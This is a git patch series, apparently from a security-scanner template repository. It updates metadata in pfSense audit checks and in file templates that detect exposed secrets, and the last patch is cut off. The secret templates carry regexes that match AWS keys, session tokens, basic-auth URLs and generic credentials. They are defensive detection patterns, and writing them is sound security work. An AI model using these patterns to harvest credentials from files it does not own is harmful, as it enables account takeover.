MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 11:09:54 -0400 Subject: [PATCH 108/609] Enhancement: file/audit/pfsense/configure-dns-server.yaml by md --- file/audit/pfsense/configure-dns-server.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/file/audit/pfsense/configure-dns-server.yaml b/file/audit/pfsense/configure-dns-server.yaml index 90955427fa..4a31f015c1 100644 --- a/file/audit/pfsense/configure-dns-server.yaml +++ b/file/audit/pfsense/configure-dns-server.yaml @@ -1,13 +1,17 @@ id: configure-dns-server info: - name: Configure DNS Server + name: DNS Server Configuration - Detect author: pussycat0x severity: info description: | - The purpose DNs server is to perform the resolution of system hostnames to Internet Protocol (IP) addresses. + Netgate DNS is recommended to be configured over TLS. This prevents intermediate parties and potential attackers from viewing the content of DNS queries and can also assure that DNS is being provided by the expected DNS servers. reference: | https://docs.netgate.com/pfsense/en/latest/recipes/dns-over-tls.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true tags: firewall,config,audit,pfsense,file @@ -28,3 +32,5 @@ file: - "" - "" condition: and + +# Enhanced by md on 2023/05/04 From 111206fa91372ff9a63f1d86c231196ba884eca4 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 11:11:51 -0400 Subject: [PATCH 109/609] Enhancement: file/audit/pfsense/configure-session-timeout.yaml by md --- file/audit/pfsense/configure-session-timeout.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/file/audit/pfsense/configure-session-timeout.yaml b/file/audit/pfsense/configure-session-timeout.yaml index 8dadd7818a..f81085eb4e 100644 --- a/file/audit/pfsense/configure-session-timeout.yaml +++ b/file/audit/pfsense/configure-session-timeout.yaml @@ -1,13 +1,17 @@ id: configure-session-timeout info: - name: Configure Sessions Timeout + name: Netgate Configure Sessions Timeout - Detect author: pussycat0x severity: info description: | - Indefinite or even long session timeout window increase the risk of attackers abusing abandoned sessions. + Netgate configure sessions timeout is recommended to be enabled. An indefinite or even long session timeout window can increase the risk of an attacker abusing abandoned sessions and potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. reference: | https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true tags: firewall,config,audit,pfsense,file @@ -31,3 +35,5 @@ file: - "" - "" condition: and + +# Enhanced by md on 2023/05/04 From 7af50a25f038be8421298dbc3b89ec27fd6a6149 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 11:17:00 -0400 Subject: [PATCH 111/609] Enhancement: file/audit/pfsense/enable-https-protocol.yaml by md --- file/audit/pfsense/enable-https-protocol.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/file/audit/pfsense/enable-https-protocol.yaml b/file/audit/pfsense/enable-https-protocol.yaml index b553262cde..17f69cd09c 100644 --- a/file/audit/pfsense/enable-https-protocol.yaml +++ b/file/audit/pfsense/enable-https-protocol.yaml @@ -1,14 +1,17 @@ id: enable-https-protocol info: - name: Enable HTTPS on Web Management + name: Netgate Web Admin Management Portal/HTTPS - Detect author: pussycat0x severity: info description: | - Web Admin Management Portal should only be accessed using HTTPS Protocol.HTTP transmits all data (including passwords) in clear text over the network and - provides no assurance of the identity of the hosts involved. + Netgate Web Admin Management Portal is recommended to be accessible using only HTTPS protocol. HTTP transmits all data, including passwords, in clear text over the network and provides no assurance of the identity of the hosts involved, making it possible for an attacker to obtain sensitive information, modify data, and/or execute unauthorized operations. reference: | https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true tags: firewall,config,audit,pfsense,file @@ -31,3 +34,5 @@ file: - "" - "" condition: and + +# Enhanced by md on 2023/05/04 From e9ae0ed538c6f86150095021ec42cf840dd51463 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 11:24:28 -0400 Subject: [PATCH 112/609] Enhancement: file/audit/pfsense/known-default-account.yaml by md --- file/audit/pfsense/known-default-account.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/file/audit/pfsense/known-default-account.yaml b/file/audit/pfsense/known-default-account.yaml index 5edff80ccb..c545902e59 100644 --- a/file/audit/pfsense/known-default-account.yaml +++ b/file/audit/pfsense/known-default-account.yaml @@ -1,16 +1,17 @@ id: known-default-account info: - name: Known Default Account - Detect + name: Netgate Known Default Account - Detect author: pussycat0x severity: info description: | - In order to attempt access to known devices' platforms, attackers use the available database of the known default accounts for each platform or Operating System. - The known default accounts are often (without limiting to) the following: 'admin'. + Netgate configured known default accounts are recommended to be deleted. In order to attempt access to known devices' platforms, an attacker can use the available database of the known default accounts for each platform or operating system. Known default accounts are often, but not limited to, 'admin'. reference: | - https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html - remediation: | - Deletes the known default accounts configured. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: audit,config,file,firewall,pfsense file: @@ -25,3 +26,5 @@ file: - "" - "user-shell-access" condition: and + +# Enhanced by md on 2023/05/04 From 872b35e302254d8d474fd2b4c76e88ca52d61a48 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 11:30:32 -0400 Subject: [PATCH 113/609] Enhancement: file/audit/pfsense/password-protected-consolemenu.yaml by md --- file/audit/pfsense/password-protected-consolemenu.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/file/audit/pfsense/password-protected-consolemenu.yaml b/file/audit/pfsense/password-protected-consolemenu.yaml index e66727a356..fe17f13eda 100644 --- a/file/audit/pfsense/password-protected-consolemenu.yaml +++ b/file/audit/pfsense/password-protected-consolemenu.yaml @@ -1,13 +1,17 @@ id: password-protected-consolemenu info: - name: Configure Password Protected on Console Menu + name: Netgate Password Protection Configuration - Detect author: pussycat0x severity: info description: | - An unattended computer with an open Console Menu session to the device could allow an unauthorized user access to the firewall’s management. + Netgate password protection via the Console Menu is recommended to be configured. An unattended computer with an open Console Menu session can allow an unauthorized user access to the firewall management. reference: | https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true tags: firewall,config,audit,pfsense,file @@ -31,3 +35,5 @@ file: - "" - "" condition: and + +# Enhanced by md on 2023/05/04 From 2f6c63effc4b68a7ead6dd4212a599378b578eed Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 11:33:33 -0400 Subject: [PATCH 114/609] Enhancement: file/audit/pfsense/set-hostname.yaml by md --- file/audit/pfsense/set-hostname.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/file/audit/pfsense/set-hostname.yaml b/file/audit/pfsense/set-hostname.yaml index 0959a0ed8e..8d6e35e4cc 100644 --- a/file/audit/pfsense/set-hostname.yaml +++ b/file/audit/pfsense/set-hostname.yaml @@ -1,14 +1,17 @@ id: set-hostname info: - name: Ensure Hostname is Set + name: Netgate Hostname - Detect author: pussycat0x severity: info description: | - Ensure Hostname is set is a process that helps to ensure that the computer or device is being identified correctly on a network. - The hostname is a unique identifier for the device, and it is important that it is properly set so that other devices on the network can identify it. + Netgate hostname should be set so that other devices on the network can correctly identify it. The hostname is a unique identifier for the device. reference: | https://docs.netgate.com/pfsense/en/latest/config/general.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: firewall,config,audit,pfsense,file file: @@ -23,3 +26,5 @@ file: - "" - "domain>" condition: and + +# Enhanced by md on 2023/05/04 From 18d16b7af69cf9af69c30a47335b18f4a07ad250 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 12:19:06 -0400 Subject: [PATCH 115/609] Enhancement: file/keys/amazon/amazon-mws-auth-token.yaml by md --- file/keys/amazon/amazon-mws-auth-token.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/file/keys/amazon/amazon-mws-auth-token.yaml b/file/keys/amazon/amazon-mws-auth-token.yaml index 0ab5703b9c..e7ae18d486 100644 --- a/file/keys/amazon/amazon-mws-auth-token.yaml +++ b/file/keys/amazon/amazon-mws-auth-token.yaml @@ -1,9 +1,14 @@ id: amazon-mws-auth-token-value info: - name: Amazon MWS Auth Token + name: Amazon MWS Authentication Token - Detect author: gaurang severity: medium + description: Amazon MWS authentication token was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 tags: token,file,amazon,auth file: @@ -14,3 +19,5 @@ file: - type: regex regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" + +# Enhanced by md on 2023/05/04 From accb8cbfbf8504c40024d16985204228ee40e6dc Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 12:21:41 -0400 Subject: [PATCH 116/609] Enhancement: file/keys/amazon/amazon-account-id.yaml by md --- file/keys/amazon/amazon-account-id.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/keys/amazon/amazon-account-id.yaml b/file/keys/amazon/amazon-account-id.yaml index 78aeda4a97..bedc1a4eb4 100644 --- a/file/keys/amazon/amazon-account-id.yaml +++ b/file/keys/amazon/amazon-account-id.yaml @@ -1,11 +1,16 @@ id: amazon-account-id info: - name: AWS Account ID + name: Amazon Web Services Account ID - Detect author: DhiyaneshDK severity: info + description: Amazon Web Services Account ID token was detected. reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" tags: aws,amazon,token,file @@ -18,4 +23,6 @@ file: - type: regex part: body regex: - - '(?i)aws_?(?:account)_?(?:id)?["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([0-9]{4}-?[0-9]{4}-?[0-9]{4})' \ No newline at end of file + - '(?i)aws_?(?:account)_?(?:id)?["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([0-9]{4}-?[0-9]{4}-?[0-9]{4})' + +# Enhanced by md on 2023/05/04 From aa23cf08703fa58add3d228e629a26d4afe24158 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 12:28:46 -0400 Subject: [PATCH 117/609] Enhancement: file/keys/amazon/amazon-session-token.yaml by md --- file/keys/amazon/amazon-session-token.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/keys/amazon/amazon-session-token.yaml b/file/keys/amazon/amazon-session-token.yaml index 0877ad4ce0..caf0d153d7 100644 --- a/file/keys/amazon/amazon-session-token.yaml +++ b/file/keys/amazon/amazon-session-token.yaml @@ -1,11 +1,16 @@ id: amazon-session-token info: - name: Amazon Session Token + name: Amazon Session Token - Detect author: DhiyaneshDK severity: info + description: Amazon session token was detected. reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" tags: aws,amazon,token,file,session @@ -18,4 +23,6 @@ file: - type: regex part: body regex: - - '(?i)(?:aws.?session|aws.?session.?token|aws.?token)["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]' \ No newline at end of file + - '(?i)(?:aws.?session|aws.?session.?token|aws.?token)["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]' + +# Enhanced by md on 2023/05/04 From b7407eee27111a0259118b9e98758028e4d13792 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 12:30:24 -0400 Subject: [PATCH 118/609] Enhancement: file/keys/amazon/amazon-sns-token.yaml by md --- file/keys/amazon/amazon-sns-token.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/file/keys/amazon/amazon-sns-token.yaml b/file/keys/amazon/amazon-sns-token.yaml index 96d12f5fbb..46e4dad006 100644 --- a/file/keys/amazon/amazon-sns-token.yaml +++ b/file/keys/amazon/amazon-sns-token.yaml @@ -1,9 +1,14 @@ id: amazon-sns-token info: - name: Amazon SNS Token Detect + name: Amazon SNS Token - Detect author: TheBinitGhimire severity: info + description: Amazon SNS token was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: file,token,amazon,aws file: @@ -15,3 +20,5 @@ file: name: amazon-sns-topic regex: - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' + +# Enhanced by md on 2023/05/04 From 7a7826258ac5e11a6e0ffb152c565b04b9e218ca Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 13:12:20 -0400 Subject: [PATCH 119/609] Enhancement: file/keys/amazon/aws-access-id.yaml by md --- file/keys/amazon/aws-access-id.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/file/keys/amazon/aws-access-id.yaml b/file/keys/amazon/aws-access-id.yaml index 1bf83e581c..d39a1d5c5e 100644 --- a/file/keys/amazon/aws-access-id.yaml +++ b/file/keys/amazon/aws-access-id.yaml @@ -1,9 +1,14 @@ id: aws-access-key info: - name: AWS Access Key ID + name: Amazon Web Services Access Key ID - Detect author: gaurang severity: info + description: Amazon Web Services Access Key ID token was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: token,file file: @@ -14,3 +19,5 @@ file: - type: regex regex: - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" + +# Enhanced by md on 2023/05/04 From c5467d297c8439ae755aaa1bc5ff641f1023775f Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 13:15:47 -0400 Subject: [PATCH 120/609] Enhancement: file/keys/amazon/aws-cognito.yaml by md --- file/keys/amazon/aws-cognito.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/file/keys/amazon/aws-cognito.yaml b/file/keys/amazon/aws-cognito.yaml index d6d5f5f8e7..ba3992a239 100644 --- a/file/keys/amazon/aws-cognito.yaml +++ b/file/keys/amazon/aws-cognito.yaml @@ -1,9 +1,14 @@ id: aws-cognito-pool info: - name: AWS Cognito Pool ID + name: Amazon Web Services Cognito Pool ID - Detect author: gaurang severity: info + description: Amazon Web Services Cognito Pool ID token was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: token,file file: @@ -30,3 +35,5 @@ file: - "us-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - "us-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - "sa-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" + +# Enhanced by md on 2023/05/04 From 97bf294843350a9ccbf3b7cbca35ad9e35192886 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 13:16:56 -0400 Subject: [PATCH 121/609] Enhancement: file/keys/branch-key.yaml by md --- file/keys/branch-key.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/file/keys/branch-key.yaml b/file/keys/branch-key.yaml index 877dd31a45..2ea4bdee4e 100644 --- a/file/keys/branch-key.yaml +++ b/file/keys/branch-key.yaml @@ -1,11 +1,16 @@ id: branch-key info: - name: Branch.io Live Key + name: Branch.io Live Key - Detect author: 0xh7ml severity: info + description: Branch.io live key token was detected. reference: - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: token,file file: @@ -16,3 +21,5 @@ file: - type: regex regex: - "key_live_.{32}" + +# Enhanced by md on 2023/05/04 From d126d7dc439a2f7ba882b62e062d10a2fd7fd73a Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 13:22:16 -0400 Subject: [PATCH 122/609] Enhancement: file/keys/cloudinary.yaml by md --- file/keys/cloudinary.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/file/keys/cloudinary.yaml b/file/keys/cloudinary.yaml index 0823117195..f75eda3603 100644 --- a/file/keys/cloudinary.yaml +++ b/file/keys/cloudinary.yaml @@ -1,9 +1,14 @@ id: cloudinary-basic-auth info: - name: Cloudinary Basic Auth + name: Cloudinary Basic Authorization - Detect author: gaurang severity: high + description: Cloudinary basic authorization token was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 tags: token,file,cloudinary file: @@ -14,3 +19,5 @@ file: - type: regex regex: - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+" + +# Enhanced by md on 2023/05/04 From 0f46fafb595a141a5371b00f685a0b5854eb3584 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 13:26:13 -0400 Subject: [PATCH 123/609] Enhancement: file/keys/code-climate-token.yaml by md --- file/keys/code-climate-token.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/keys/code-climate-token.yaml b/file/keys/code-climate-token.yaml index eeeba21c8e..d4bef62798 100644 --- a/file/keys/code-climate-token.yaml +++ b/file/keys/code-climate-token.yaml @@ -1,12 +1,17 @@ id: code-climate-token info: - name: Code Climate Token + name: Code Climate Token - Detect author: DhiyaneshDK severity: info + description: Code Climate token was detected. reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/codeclimate.yml - https://github.com/codeclimate/ruby-test-reporter/issues/34 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" tags: codeclimate,token,file @@ -19,4 +24,6 @@ file: - type: regex part: body regex: - - '(?i)codeclima.{0,50}\b([a-f0-9]{64})\b' \ No newline at end of file + - '(?i)codeclima.{0,50}\b([a-f0-9]{64})\b' + +# Enhanced by md on 2023/05/04 From f92781a4ab4af39e908c32bd8472a1cfb61a430a Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 13:33:50 -0400 Subject: [PATCH 124/609] Enhancement: file/keys/cratesio-api-key.yaml by md --- file/keys/cratesio-api-key.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/keys/cratesio-api-key.yaml b/file/keys/cratesio-api-key.yaml index 69ede84c67..082783ed38 100644 --- a/file/keys/cratesio-api-key.yaml +++ b/file/keys/cratesio-api-key.yaml @@ -1,13 +1,18 @@ id: cratesio-api-key info: - name: Crates.io API Key + name: Crates.io API Key - Detect author: DhiyaneshDK severity: info + description: Crates.io API key was detected. reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/crates.io.yml - https://crates.io/data-access - https://github.com/rust-lang/crates.io/blob/master/src/util/token.rs + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" tags: crates,token,file @@ -20,4 +25,6 @@ file: - type: regex part: body regex: - - '\bcio[a-zA-Z0-9]{32}\b' \ No newline at end of file + - '\bcio[a-zA-Z0-9]{32}\b' + +# Enhanced by md on 2023/05/04 From 8b6c7da916c2e7f990079b68aa71c5edc1fd4e4c Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 13:36:23 -0400 Subject: [PATCH 125/609] Enhancement: file/keys/credential-exposure.yaml by md --- file/keys/credential-exposure.yaml | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/file/keys/credential-exposure.yaml b/file/keys/credential-exposure.yaml index 7ff73aca3a..1af52113c1 100644 --- a/file/keys/credential-exposure.yaml +++ b/file/keys/credential-exposure.yaml @@ -1,6 +1,13 @@ id: credentials-disclosure-file -# Extract secrets regex like api keys, password, token, etc ... for different services +info: + name: Credentials Disclosure Check + author: Sy3Omda,geeknik,forgedhallpass,ayadi + severity: unknown + description: Check for multiple keys/tokens/passwords hidden inside of files. + tags: exposure,token,file,disclosure + +# Extract secrets regex like api keys, password, token, etc ... for different services. # Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue. # Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes. # Regex count:- 687 @@ -9,14 +16,6 @@ id: credentials-disclosure-file # This template requires manual inspection once found valid match. # Generic token could be anything matching below regex. # Impact of leaked token depends on validation of leaked token. - -info: - name: Credentials Disclosure Check - author: Sy3Omda,geeknik,forgedhallpass,ayadi - severity: unknown - description: Look for multiple keys/tokens/passwords hidden inside of files. - tags: exposure,token,file,disclosure - # The regexes are copied from exposures/tokens/generic/credentials-disclosure.yaml # TODO After https://github.com/projectdiscovery/nuclei/issues/1510 is implemented, we should be able to re-use them, instead of duplicating # Example cases to match against: https://regex101.com/r/HPtaU2/1 @@ -719,3 +718,5 @@ file: - "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+" + +# Enhanced by md on 2023/05/04 From fdb5851404ecf1ab0a75b3a326afcae697490636 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 13:39:17 -0400 Subject: [PATCH 126/609] Enhancement: file/keys/credentials.yaml by md --- file/keys/credentials.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/file/keys/credentials.yaml b/file/keys/credentials.yaml index 1c7e110e0a..ec48102411 100644 --- a/file/keys/credentials.yaml +++ b/file/keys/credentials.yaml @@ -1,9 +1,14 @@ id: basic-auth-creds info: - name: Basic Auth Credentials + name: Basic Authorization Credentials Check author: gaurang severity: high + description: Basic authorization credentials check was conducted. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 tags: token,file,auth file: @@ -14,3 +19,5 @@ file: - type: regex regex: - "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]" + +# Enhanced by md on 2023/05/04 From 0dc53660718266cd19d157dfa8f9ff856d70bb45 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 13:40:13 -0400 Subject: [PATCH 127/609] Enhancement: file/keys/dynatrace-token.yaml by md --- file/keys/dynatrace-token.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/keys/dynatrace-token.yaml b/file/keys/dynatrace-token.yaml index 3ad533dd3f..474c60ce5d 100644 --- a/file/keys/dynatrace-token.yaml +++ b/file/keys/dynatrace-token.yaml @@ -1,9 +1,14 @@ id: dynatrace-token info: - name: Dynatrace Token + name: Dynatrace Token - Detect author: gaurang severity: high + description: Dynatrace token was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 tags: token,file file: @@ -13,4 +18,6 @@ file: extractors: - type: regex regex: - - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" \ No newline at end of file + - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" + +# Enhanced by md on 2023/05/04 From bab6c1b68d56ea7507c4cbbbb32f07a8efd45dcd Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 13:42:40 -0400 Subject: [PATCH 128/609] Enhancement: file/keys/facebook/facebook-client-id.yaml by md --- file/keys/facebook/facebook-client-id.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/file/keys/facebook/facebook-client-id.yaml b/file/keys/facebook/facebook-client-id.yaml index 91942db402..17fbbdc79c 100644 --- a/file/keys/facebook/facebook-client-id.yaml +++ b/file/keys/facebook/facebook-client-id.yaml @@ -1,9 +1,14 @@ id: facebook-client-id info: - name: Facebook Client ID + name: Facebook Client ID - Detect author: gaurang severity: info + description: Facebook client ID token was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: token,file,facebook file: @@ -14,3 +19,5 @@ file: - type: regex regex: - "(?i)(facebook|fb)(.{0,20})?['\"][0-9]{13,17}['\"]" + +# Enhanced by md on 2023/05/04 From 24d58ae4f3b01faac0c09054b4e08f9854356a8d Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 13:48:13 -0400 Subject: [PATCH 129/609] Enhancement: file/keys/facebook/facebook-secret.yaml by md --- file/keys/facebook/facebook-secret.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/file/keys/facebook/facebook-secret.yaml b/file/keys/facebook/facebook-secret.yaml index 63da7e748e..1889fa2a85 100644 --- a/file/keys/facebook/facebook-secret.yaml +++ b/file/keys/facebook/facebook-secret.yaml @@ -1,9 +1,10 @@ id: facebook-secret-key info: - name: Facebook Secret Key + name: Facebook Secret Key - Detect author: gaurang severity: low + description: Facebook secret key token was detected. tags: token,file,facebook file: @@ -14,3 +15,5 @@ file: - type: regex regex: - "(?i)(facebook|fb)(.{0,20})?(?-i)['\"][0-9a-f]{32}['\"]" + +# Enhanced by md on 2023/05/04 From 9c45bc49be24a044472a45358f640f3d0fea52d4 Mon Sep 17 00:00:00 2001 From: Dmitrii Vershinin <93260071+vershinind@users.noreply.github.com> Date: Mon, 15 May 2023 10:18:18 +0300 Subject: [PATCH 130/609] Update webflow-takeover.yaml --- http/takeovers/webflow-takeover.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/http/takeovers/webflow-takeover.yaml b/http/takeovers/webflow-takeover.yaml index 992bb26f50..4bb447388c 100644 --- a/http/takeovers/webflow-takeover.yaml +++ b/http/takeovers/webflow-takeover.yaml @@ -2,7 +2,7 @@ id: 